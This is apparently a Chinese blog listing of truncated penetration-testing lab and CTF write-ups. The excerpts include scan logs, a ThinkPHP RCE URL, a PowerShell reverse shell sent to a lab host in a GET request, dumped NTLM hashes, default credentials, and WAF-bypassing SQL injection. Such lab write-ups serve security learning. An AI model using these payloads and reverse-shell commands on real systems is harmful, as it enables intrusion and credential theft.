会员日半价捏,打过十二点了艹了还没用上原价,为什么半价打过十二点之后所有的都按原价算 。。好贵啊我日 flag01上来俩 ip: 123439.98.124.24439.99.147.240 123456789101112131415161718192021222324252627282930313233343536373839404142[2025-03-10 19:37:38] [INFO] 暴力破解线程数: 1[2025-03-10 19:37:38] [INFO] 开始信息扫描[2025-03-10 19:37:38] [INFO] 最终有效主机数量: 1[2025-03-10 19:37:38] [INFO] 开始主机扫描[2025-03-10 19:37:38] [INFO] 有效端口数量: 233[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:80[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:22[2025-03-10 19:37:38] [SUCCESS] 服 ...
flag01TP5.0.23 RCE 权限低,先看 suid:FFFF 1find / -user root -perm -4000 -print 2> result.txt 没有熟悉的,看看 sudo -l 有 mysql flag{60b53231- fscan 一下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647[2025-03-10 17:44:52] [HOST] 目标:172.22.1.15 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.2 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.21 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.18 状态:alive 详情:p ...
flag01123456789101112131415161718192021[2025-03-09 20:26:33] [INFO] 暴力破解线程数: 1[2025-03-09 20:26:33] [INFO] 开始信息扫描[2025-03-09 20:26:33] [INFO] 最终有效主机数量: 1[2025-03-09 20:26:33] [INFO] 开始主机扫描[2025-03-09 20:26:34] [INFO] 有效端口数量: 233[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:6379[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:21[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:80[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:22[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:21 => [ft ...
flag01fscan 扫一下。直接能扫到 1433 端口的密码: 1sa 1qaz!QAZ 命令直接上线就好了。 但是权限太低了。 sweetpotato 提权给 cs 上线: flag02看 flag 的时候发现还有个 john 用户。 1logonpasswords 没有明文密码,拿到 john 的 hash。 1234Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027::: 查 ...
打个简单的。 flag01actuator 泄露,里面有 key。 8080 上有 shiro 上哥斯拉 🐎。 权限不够,尝试 suid 提权。 1find / -perm -u=s -type f 2>/dev/null 只有 vim.basic 能用。 这里写个公钥获取 root 权限:ssh-keygen -t rsa 生成一对公私钥一路回车。 1vim.basic /root/.ssh/authorized_keys 写公钥没那么多要求,但是写私钥注意这个内容一定要整理好格式,不然会无法识别。 flag021fscan -h 172.30.12.5/24 -eh 172.30.12.5 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253[2025-03-07 20:47:42] [INFO] 暴力破解线程数: 1[2025-03-07 20:47:42] [INFO] 开始信息扫描[2025-03-07 20:47: ...
flag01上来一个 wordpress。 /wp-admin路由是后台管理,admin:123456登录。 修改当前主题 404 模板 RCE. 1http://39.99.150.53/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone 这个改了之后在渲染之后的页面没法进行传参连接,必须用模板 php 访问。 1234# 这个不行http://39.99.150.53/index.php/123/# 这个可以http://39.99.150.53/wp-content/themes/twentytwentyone/404.php 这个要是没文档得 wpscan 扫一下。 蚂蚁的剑连上之后直接 vshell 上线。 flag02123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737 ...
入口:39.101.76.98 扫下: 123456789101112131415161718192021[2025-03-04 18:33:08] [INFO] 暴力破解线程数: 1[2025-03-04 18:33:08] [INFO] 开始信息扫描[2025-03-04 18:33:08] [INFO] 最终有效主机数量: 1[2025-03-04 18:33:08] [INFO] 开始主机扫描[2025-03-04 18:33:09] [INFO] 有效端口数量: 233[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:80[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:22[2025-03-04 18:33:09] [SUCCESS] 服务识别 39.101.76.98:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH- ...
192.168.10.65 梦想 cms lmxcms 代码审计-mvc 架构练手首选 > 梦想 cms(lmxcms)1.41 版本下载_梦想 cms(lmxcms) mvc 架构:从源码路径 c 和 m 部分可以看出。需要找到路由 有安全狗。得绕过 waf。 双重 url 加密可以绕过。 12341'and updatexml(0,concat(0x7e,user()),1)#%25%33%31%25%32%37%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35 ...
趁着免费正好来打一波 第一台http://172.20.56.32/ 上来一个 php: nday 一把嗦 1http://172.20.56.32//?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 写马没写上,猜测有杀毒。 1tasklist /svc 开了 360 和 wd。一会找个过免杀的项目。 反弹 shell工具似乎有点问题,手动把 shell 弹出来。 12345678910GET //?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell+-nop+-c+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27172.16.233.2%27%2C7777%29%3 ...
写在之前Season7 开始了。这个靶机提供了两个服务rose / KxEPkKe6R8su 这个靶机上来被 xp_cmdshell 非预期了,过了挺长时间才找到一份解决了的 Wp,这里学习下。 不懂为什么是 EZ、感觉和之前那个 Infiltrator 一个难度。 信息收集123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778nmap -sV -sC -O 10.10.11.51Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 23:26 CSTNmap scan report for 10.10.11.51Host is up (0.16s latency).Not shown: 988 filtered tcp ports (no-response)PORT STATE S ...